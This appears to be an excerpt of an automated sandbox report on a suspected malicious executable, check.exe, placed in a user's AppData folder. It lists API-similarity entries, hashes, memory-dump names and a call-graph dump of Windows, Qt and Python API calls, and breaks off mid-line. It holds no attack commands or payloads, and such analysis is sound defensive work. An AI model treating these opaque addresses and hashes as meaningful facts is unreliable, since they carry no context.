                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                • Instruction ID: 1c99e6d7095ffba4ac290d6449393b2608373ef2113506b6e8577f38edebe2e2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23110C21F0C14282F6549B6AE54467E6251EF8D788F68C070DF4BC7BA9CD3DD8E18240
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                • Instruction ID: f067b6677e4615618289e2b72fa6c63a4a38a2ff9403df407e94fc9fc25b2dd7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5411922A0838247F7608725950137A6766EBA9BACF24C275EE5EC6BF5DF7CD4418700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF60B139046
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B13A948: RtlFreeHeap.NTDLL(?,?,?,00007FF60B142D22,?,?,?,00007FF60B142D5F,?,?,00000000,00007FF60B143225,?,?,?,00007FF60B143157), ref: 00007FF60B13A95E
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B13A948: GetLastError.KERNEL32(?,?,?,00007FF60B142D22,?,?,?,00007FF60B142D5F,?,?,00000000,00007FF60B143225,?,?,?,00007FF60B143157), ref: 00007FF60B13A968
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF60B12CBA5), ref: 00007FF60B139064
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                                • API String ID: 3580290477-3885351997
                                                                                                                                                                                                                • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                • Instruction ID: 48f7f69546c5de67c17beacf41f4e78011fac59af46ebc016fe368037e5ba6b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38418E32A08B5286EB15DF25D8400BD67A4EF49BD8B65C0B5E94FD7BA5EE3CE4818340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                • Instruction ID: 441de3a6353f50f74bb9601048fdef0722fc3daaff216b9c2ca333b035fad7c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC41A432B18B8181DB608F25E4443AA6760FB9CB98F648135EE4ED77A8EF3CD401C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                • Instruction ID: 5c238242463a9a0405ade538c1b8a839a3436a9c50b3e6ba816588fe1f09eb6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E521B6A2F1864181EB209B15D04426D73B5FB8CF8CF65C075D68EC36A4EF7CD9858751
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                • Instruction ID: 86ee8d1dc07967bd19677ec09f9cb832d0264b0f0fe111a50ae346757aed901b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20112E32618B8582EB618F15E44025A77E4FB8DB88F688270DF8E87764DF3CD9528700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                • Instruction ID: 1afc2359f1443ac1901a820ac464bceba6c1e19b95361f9d339291acf6c4a329
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C01A722A1C20385F7309F61946527E23A0EF8D74DFA48475D68EC36A1EF3CE5048B15

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:11.2%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                Total number of Nodes:1813
                                                                                                                                                                                                                Total number of Limit Nodes:68
                                                                                                                                                                                                                execution_graph 6907 7ffb02f643a0 6908 7ffb02f643a9 6907->6908 6909 7ffb02f643e3 6907->6909 6908->6909 6910 7ffb02f643d0 ??1QXmlStreamAttribute@@QEAA 6908->6910 6910->6909 6910->6910 6911 7ffb02f623a0 6912 7ffb02f623e2 6911->6912 6913 7ffb02f6241d 6912->6913 6914 7ffb03062300 2 API calls 6912->6914 6915 7ffb02f623f0 ?key@QSystemSemaphore@@QEBA?AVQString@ 6914->6915 6916 7ffb02f62418 6915->6916 6917 7ffb02f5e3a0 6918 7ffb02f5e3c9 6917->6918 6919 7ffb02f5e3d1 6918->6919 6920 7ffb02f5e442 6918->6920 6921 7ffb02f5e41b ??8?$QVector@VQXmlStreamAttribute@@@@QEBA_NAEBV0@ PyBool_FromLong 6918->6921 6922 7ffb02f5e458 6920->6922 6923 7ffb02f5e452 _Py_Dealloc 6920->6923 6923->6922 6924 7ffb030583b0 PyType_GenericNew 6925 7ffb030583df 6924->6925 6926 7ffb02f4e3a0 6927 7ffb02f4e3cc 6926->6927 6928 7ffb02f4e4cb ?removeColumns@QTransposeProxyModel@@UEAA_NHHAEBVQModelIndex@@ PyBool_FromLong 6927->6928 6929 7ffb02f4e4e3 PyBool_FromLong 6927->6929 6930 7ffb02f4e4fe 6927->6930 6932 7ffb02f783a0 6933 7ffb02f78439 6932->6933 6934 7ffb02f7843d ?indexIn@QRegExp@@QEBAHAEBVQString@@HW4CaretMode@1@ 6933->6934 6935 7ffb02f784aa 6933->6935 6936 7ffb02f78492 PyLong_FromLong 6934->6936 6937 7ffb02f463a0 6938 7ffb02f463e1 6937->6938 6939 7ffb02f463e5 ?error@QXmlStreamReader@@QEBA?AW4Error@1 PyBool_FromLong 6938->6939 6940 7ffb02f46403 6938->6940 6941 7ff60b141460 6943 7ff60b14148f 6941->6943 6942 7ff60b141497 6944 7ff60b14149c _invalid_parameter_noinfo 6942->6944 6943->6942 6948 7ff60b1414ce 6943->6948 6945 7ff60b141504 6944->6945 6950 7ff60b141541 6945->6950 6955 7ff60b140338 LeaveCriticalSection 6945->6955 6948->6945 6951 7ff60b140474 6948->6951 6954 7ff60b140481 6951->6954 6952 7ff60b140498 _invalid_parameter_noinfo 6953 7ff60b14049f 6952->6953 6953->6945 6954->6952 6954->6953 6956 7ff60b141c64 6957 7ff60b141c92 6956->6957 6957->6957 6958 7ff60b141ca9 6957->6958 6963 7ff60b13eb98 6957->6963 6960 7ff60b141cdf 6961 7ff60b13eb98 HeapAlloc 6960->6961 6962 7ff60b141d3f 6960->6962 6961->6962 6966 7ff60b13eba9 6963->6966 6964 7ff60b13ebde HeapAlloc 6965 7ff60b13ebf8 6964->6965 6964->6966 6965->6960 6966->6964 6966->6965 6967 7ffb02fbe3a0 6968 7ffb02fbe3fd 6967->6968 6969 7ffb02fbe449 6968->6969 6970 7ffb03062300 2 API calls 6968->6970 6971 7ffb02fbe410 ??0QObject@@QEAA@PEAV0@ 6970->6971 6972 7ffb030563a0 PyList_Size 6973 7ffb030563df 6972->6973 6974 7ffb03056400 PyList_GetItem PyType_GetFlags 6973->6974 6977 7ffb0305642c ?toLocal8Bit@QString@@QEHAA?AVQByteArray@ ??1QString@@QEAA ?constData@QByteArray@ ?qstrdup@@YAPEADPEBD ??1QByteArray@@QEAA 6973->6977 6978 7ffb030564b7 6973->6978 6974->6973 6975 7ffb03056469 PyType_GetFlags 6974->6975 6975->6973 6976 7ffb03056479 PyBytes_AsString ?qstrdup@@YAPEADPEBD 6975->6976 6976->6973 6977->6973 6979 7ffb02f723b0 6980 7ffb02f723fa 6979->6980 6981 7ffb02f723fe ?convert@QVariant@@QEAA_NH PyBool_FromLong 6980->6981 6982 7ffb02f7241b 6980->6982 6983 7ffb02fc83b0 6984 7ffb02fc83d6 6983->6984 6985 7ffb02fc843d 6984->6985 6986 7ffb02fc83f8 PyEval_SaveThread ?exec@QCoreApplication@ PyEval_RestoreThread 6984->6986 6987 7ffb02fc8426 PyLong_FromLong 6986->6987 6988 7ffb030023b0 6989 7ffb03002413 6988->6989 6990 7ffb03002417 ?toInt@QByteArray@@QEBAHPEA_NH 6989->6990 6991 7ffb03002453 6989->6991 6992 7ffb0300244e 6990->6992 6993 7ffb02f983b0 6994 7ffb02f983f7 6993->6994 6995 7ffb02f983fc ?mapToSource@QSortFilterProxyModel@@UEBA?AVQModelIndex@@AEBV2@ 6994->6995 6996 7ffb02f9840d 6994->6996 6995->6996 6997 7ff60b147c74 6998 7ff60b147c89 6997->6998 6999 7ff60b147c93 6997->6999 7000 7ff60b13d5fc _fread_nolock HeapAlloc 6998->7000 7001 7ff60b147c91 6999->7001 7002 7ff60b147cd2 HeapReAlloc 6999->7002 7000->7001 7002->6999 7002->7001 7003 7ffb02f8e3b0 7004 7ffb02f8e3bd 7003->7004 7005 7ffb02f8e412 ?dispose@QListData@@SAXPEAUData@1@ 7004->7005 7006 7ffb02f8e42a 7004->7006 7007 7ffb02f8e400 ??1QCommandLineOption@@QEAA 7004->7007 7005->7006 7007->7005 7007->7007 7008 7ffb02fc43b0 7009 7ffb02fc43fe 7008->7009 7010 7ffb02fc4428 7009->7010 7011 7ffb02fc4402 ?swap@QItemSelectionRange@@QEAAXAEAV1@ 7009->7011 7012 7ffb02fa83b0 7013 7ffb02fa83d6 7012->7013 7014 7ffb02fa840c 7013->7014 7015 7ffb03062300 2 API calls 7013->7015 7016 7ffb02fa83e4 ??0QByteArray@@QEAA 7015->7016 7017 7ffb02fa8407 7016->7017 7018 7ff60b147c38 7019 7ff60b147c5a HeapSize 7018->7019 7020 7ff60b147c41 7018->7020 7021 7ff60b147c46 _invalid_parameter_noinfo 7020->7021 7022 7ff60b13cc38 7024 7ff60b13cc54 7022->7024 7023 7ff60b13cd79 7024->7023 7025 7ff60b13cd71 GetLastError 7024->7025 7026 7ff60b13cd2e WriteFile 7024->7026 7025->7023 7026->7024 7026->7025 7027 7ffb02f4c3c0 7028 7ffb02f4c3ef 7027->7028 7029 7ffb02f4c525 7028->7029 7030 7ffb03062300 2 API calls 7028->7030 7031 7ffb02f4c4b0 7030->7031 7032 7ffb02f4c4bf ?index@QTransposeProxyModel@@UEBA?AVQModelIndex@@HHAEBV2@ 7031->7032 7033 7ffb02f4c4d8 7031->7033 7032->7033 6488 7ff60b12cc3c 6489 7ff60b12cc50 6488->6489 6490 7ff60b12cc58 __scrt_acquire_startup_lock 6489->6490 6492 7ff60b12cc9b 6489->6492 6490->6492 6493 7ff60b12cc76 6490->6493 6491 7ff60b12cccc __scrt_release_startup_lock 6494 7ff60b12ccd8 6491->6494 6493->6491 6493->6492 6495 7ff60b12cd21 __scrt_get_show_window_mode 6494->6495 6496 7ff60b12cd2e 6495->6496 6498 7ff60b121000 6496->6498 6499 7ff60b121009 6498->6499 6531 7ff60b135484 6499->6531 6501 7ff60b1237fb 6535 7ff60b1236b0 6501->6535 6503 7ff60b123804 6529 7ff60b123808 6503->6529 6545 7ff60b121950 6503->6545 6505 7ff60b123825 6516 7ff60b12383c 6505->6516 6570 7ff60b1245c0 6505->6570 6507 7ff60b12392b 6507->6529 6578 7ff60b127f90 6507->6578 6509 7ff60b12395d 6510 7ff60b123962 6509->6510 6512 7ff60b123984 6509->6512 6587 7ff60b13004c 6510->6587 6512->6512 6513 7ff60b121950 37 API calls 6512->6513 6513->6516 6514 7ff60b123dc4 6560 7ff60b129390 6514->6560 6516->6514 6517 7ff60b123da7 SetDllDirectoryW LoadLibraryExW 6516->6517 6516->6529 6517->6514 6518 7ff60b123dd7 SetDllDirectoryW 6526 7ff60b123e0a 6518->6526 6530 7ff60b123e5a 6518->6530 6520 7ff60b124008 6521 7ff60b124012 PostMessageW GetMessageW 6520->6521 6522 7ff60b124035 6520->6522 6521->6522 6565 7ff60b123360 6522->6565 6523 7ff60b123f1b 6525 7ff60b123f41 PostMessageW GetMessageW 6523->6525 6523->6529 6525->6529 6526->6530 6591 7ff60b127340 6526->6591 6527 7ff60b124045 6529->6492 6530->6520 6530->6523 6532 7ff60b13f480 6531->6532 6534 7ff60b13f4d3 6532->6534 6594 7ff60b13f358 6532->6594 6534->6501 6536 7ff60b12c850 6535->6536 6537 7ff60b1236bc GetModuleFileNameW 6536->6537 6538 7ff60b1236eb GetLastError 6537->6538 6539 7ff60b123710 6537->6539 6605 7ff60b122c50 6538->6605 6602 7ff60b129280 FindFirstFileExW 6539->6602 6542 7ff60b12371a 6544 7ff60b123706 6542->6544 6613 7ff60b129440 6542->6613 6544->6503 6546 7ff60b1245c0 19 API calls 6545->6546 6547 7ff60b121985 6546->6547 6548 7ff60b121c43 6547->6548 6549 7ff60b127f90 18 API calls 6547->6549 6548->6505 6550 7ff60b1219cb 6549->6550 6559 7ff60b1219e9 6550->6559 6618 7ff60b1306d4 6550->6618 6551 7ff60b13004c 6 API calls 6551->6548 6553 7ff60b1219e5 6553->6559 6622 7ff60b13039c 6553->6622 6555 7ff60b121a20 6556 7ff60b1306d4 2 API calls 6555->6556 6555->6559 6557 7ff60b121b01 6556->6557 6558 7ff60b13039c _fread_nolock 18 API calls 6557->6558 6557->6559 6558->6559 6559->6551 6561 7ff60b1293b2 MultiByteToWideChar 6560->6561 6562 7ff60b1293d6 6560->6562 6561->6562 6564 7ff60b1293ec 6561->6564 6563 7ff60b1293f3 MultiByteToWideChar 6562->6563 6562->6564 6563->6564 6564->6518 6644 7ff60b126360 6565->6644 6567 7ff60b12338d 6567->6527 6568 7ff60b12336e 6568->6567 6656 7ff60b126050 6568->6656 6571 7ff60b1245cc 6570->6571 6572 7ff60b129390 2 API calls 6571->6572 6573 7ff60b1245f4 6572->6573 6574 7ff60b129390 2 API calls 6573->6574 6575 7ff60b124607 6574->6575 6685 7ff60b135f94 6575->6685 6577 7ff60b124616 6577->6507 6579 7ff60b127fb4 6578->6579 6580 7ff60b1306d4 2 API calls 6579->6580 6585 7ff60b12808b 6579->6585 6581 7ff60b127fd0 6580->6581 6581->6585 6743 7ff60b1378c8 6581->6743 6583 7ff60b1306d4 2 API calls 6586 7ff60b127fe5 6583->6586 6584 7ff60b13039c _fread_nolock 18 API calls 6584->6586 6585->6509 6586->6583 6586->6584 6586->6585 6588 7ff60b13007c 6587->6588 6756 7ff60b12fe28 6588->6756 6590 7ff60b130095 6590->6529 6592 7ff60b121470 37 API calls 6591->6592 6593 7ff60b127368 6592->6593 6593->6530 6601 7ff60b13546c EnterCriticalSection 6594->6601 6603 7ff60b1292bf FindClose 6602->6603 6604 7ff60b1292d2 6602->6604 6603->6604 6604->6542 6606 7ff60b12c850 6605->6606 6607 7ff60b122c70 GetCurrentProcessId 6606->6607 6608 7ff60b122cb9 6607->6608 6609 7ff60b122d45 FormatMessageW 6608->6609 6610 7ff60b122d6d 6609->6610 6611 7ff60b122d7f MessageBoxW 6609->6611 6610->6611 6612 7ff60b122daf 6611->6612 6612->6544 6614 7ff60b12946a WideCharToMultiByte 6613->6614 6615 7ff60b129495 6613->6615 6614->6615 6617 7ff60b1294ab 6614->6617 6616 7ff60b1294b2 WideCharToMultiByte 6615->6616 6615->6617 6616->6617 6617->6544 6619 7ff60b130704 6618->6619 6625 7ff60b130464 6619->6625 6621 7ff60b13071d 6621->6553 6632 7ff60b1303bc 6622->6632 6626 7ff60b1304ce 6625->6626 6628 7ff60b13048e 6625->6628 6626->6628 6631 7ff60b13546c EnterCriticalSection 6626->6631 6628->6621 6629 7ff60b1304df 6630 7ff60b135478 _fread_nolock LeaveCriticalSection 6629->6630 6630->6628 6633 7ff60b1303e6 6632->6633 6642 7ff60b1303b4 6632->6642 6634 7ff60b130432 6633->6634 6636 7ff60b1303f5 memcpy_s 6633->6636 6633->6642 6643 7ff60b13546c EnterCriticalSection 6634->6643 6638 7ff60b13040a _invalid_parameter_noinfo 6636->6638 6637 7ff60b13043a 6639 7ff60b13013c _fread_nolock 15 API calls 6637->6639 6638->6642 6640 7ff60b130451 6639->6640 6641 7ff60b135478 _fread_nolock LeaveCriticalSection 6640->6641 6641->6642 6642->6555 6645 7ff60b126375 6644->6645 6650 7ff60b1263ba 6645->6650 6660 7ff60b124560 6645->6660 6647 7ff60b12641d 6648 7ff60b128e80 3 API calls 6647->6648 6649 7ff60b12642b 6647->6649 6648->6649 6649->6650 6664 7ff60b128e80 6649->6664 6650->6568 6652 7ff60b126476 6652->6650 6653 7ff60b129390 2 API calls 6652->6653 6654 7ff60b12649a GetLastError 6653->6654 6655 7ff60b122c50 3 API calls 6654->6655 6655->6650 6657 7ff60b126070 6656->6657 6657->6657 6658 7ff60b126099 6657->6658 6668 7ff60b121470 6657->6668 6658->6567 6661 7ff60b12456a 6660->6661 6662 7ff60b129390 2 API calls 6661->6662 6663 7ff60b12458f 6662->6663 6663->6647 6665 7ff60b129390 2 API calls 6664->6665 6666 7ff60b128e94 LoadLibraryExW 6665->6666 6667 7ff60b128eb3 6666->6667 6667->6652 6669 7ff60b1245c0 19 API calls 6668->6669 6670 7ff60b121493 6669->6670 6671 7ff60b12149b 6670->6671 6672 7ff60b1306d4 2 API calls 6670->6672 6671->6657 6674 7ff60b1214d1 6672->6674 6673 7ff60b1214d5 6677 7ff60b13004c 6 API calls 6673->6677 6674->6673 6675 7ff60b121538 6674->6675 6680 7ff60b12154b 6674->6680 6681 7ff60b121210 6675->6681 6678 7ff60b1215c4 6677->6678 6678->6657 6679 7ff60b13039c _fread_nolock 18 API calls 6679->6680 6680->6673 6680->6679 6682 7ff60b121268 6681->6682 6683 7ff60b13039c _fread_nolock 18 API calls 6682->6683 6684 7ff60b12126f 6682->6684 6683->6682 6684->6673 6686 7ff60b135ec8 6685->6686 6687 7ff60b135eee 6686->6687 6689 7ff60b135f21 6686->6689 6688 7ff60b135ef3 _invalid_parameter_noinfo 6687->6688 6690 7ff60b135efe 6688->6690 6689->6690 6694 7ff60b13fecc 6689->6694 6690->6577 6692 7ff60b135f68 6698 7ff60b135478 LeaveCriticalSection 6692->6698 6695 7ff60b13fef2 6694->6695 6696 7ff60b13ff26 6695->6696 6699 7ff60b146d54 6695->6699 6696->6692 6702 7ff60b146354 6699->6702 6703 7ff60b146389 6702->6703 6704 7ff60b14636b 6702->6704 6703->6704 6705 7ff60b1463a5 6703->6705 6706 7ff60b146370 _invalid_parameter_noinfo 6704->6706 6711 7ff60b146964 6705->6711 6707 7ff60b14637e 6706->6707 6707->6696 6709 7ff60b1463d0 6709->6707 6730 7ff60b1384f8 LeaveCriticalSection 6709->6730 6712 7ff60b1469ab 6711->6712 6715 7ff60b1469d9 6712->6715 6731 7ff60b138520 6712->6731 6715->6709 6716 7ff60b146a16 CreateFileW 6717 7ff60b146afc GetFileType 6716->6717 6718 7ff60b146a81 6716->6718 6720 7ff60b146b09 GetLastError 6717->6720 6721 7ff60b146b5a 6717->6721 6719 7ff60b146ac9 GetLastError 6718->6719 6722 7ff60b146a8f CreateFileW 6718->6722 6719->6715 6723 7ff60b134e7c 6720->6723 6738 7ff60b138438 6721->6738 6722->6717 6722->6719 6724 7ff60b146b18 CloseHandle 6723->6724 6724->6715 6726 7ff60b146b4a 6724->6726 6726->6715 6727 7ff60b146b7c 6727->6715 6728 7ff60b146c9c CloseHandle CreateFileW 6727->6728 6728->6726 6729 7ff60b146ce3 GetLastError 6728->6729 6729->6726 6734 7ff60b138543 6731->6734 6733 7ff60b138641 6733->6715 6733->6716 6735 7ff60b13856c 6734->6735 6736 7ff60b1385c2 EnterCriticalSection 6734->6736 6742 7ff60b140338 LeaveCriticalSection 6735->6742 6736->6735 6737 7ff60b1385d1 LeaveCriticalSection 6736->6737 6737->6734 6739 7ff60b13845b 6738->6739 6740 7ff60b1384b9 6738->6740 6739->6740 6741 7ff60b1384b0 SetStdHandle 6739->6741 6740->6727 6741->6740 6744 7ff60b1378f8 6743->6744 6747 7ff60b1373d4 6744->6747 6746 7ff60b137911 6746->6586 6748 7ff60b13741e 6747->6748 6754 7ff60b1373ef 6747->6754 6755 7ff60b13546c EnterCriticalSection 6748->6755 6750 7ff60b137423 6751 7ff60b137440 _invalid_parameter_noinfo 6750->6751 6752 7ff60b13742f 6751->6752 6753 7ff60b135478 _fread_nolock LeaveCriticalSection 6752->6753 6753->6754 6754->6746 6757 7ff60b12fe71 6756->6757 6758 7ff60b12fe43 6756->6758 6757->6758 6764 7ff60b13546c EnterCriticalSection 6757->6764 6758->6590 6760 7ff60b12fe88 6761 7ff60b12fea4 LeaveCriticalSection _invalid_parameter_noinfo CloseHandle GetLastError 6760->6761 6762 7ff60b12fe94 6761->6762 6763 7ff60b135478 _fread_nolock LeaveCriticalSection 6762->6763 6763->6758 7034 7ffb02f223c0 7035 7ffb02f2244c 7034->7035 7036 7ffb02f22450 ?setFragment@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@ 7035->7036 7037 7ffb02f224a2 7035->7037 7038 7ffb02f22489 7036->7038 7039 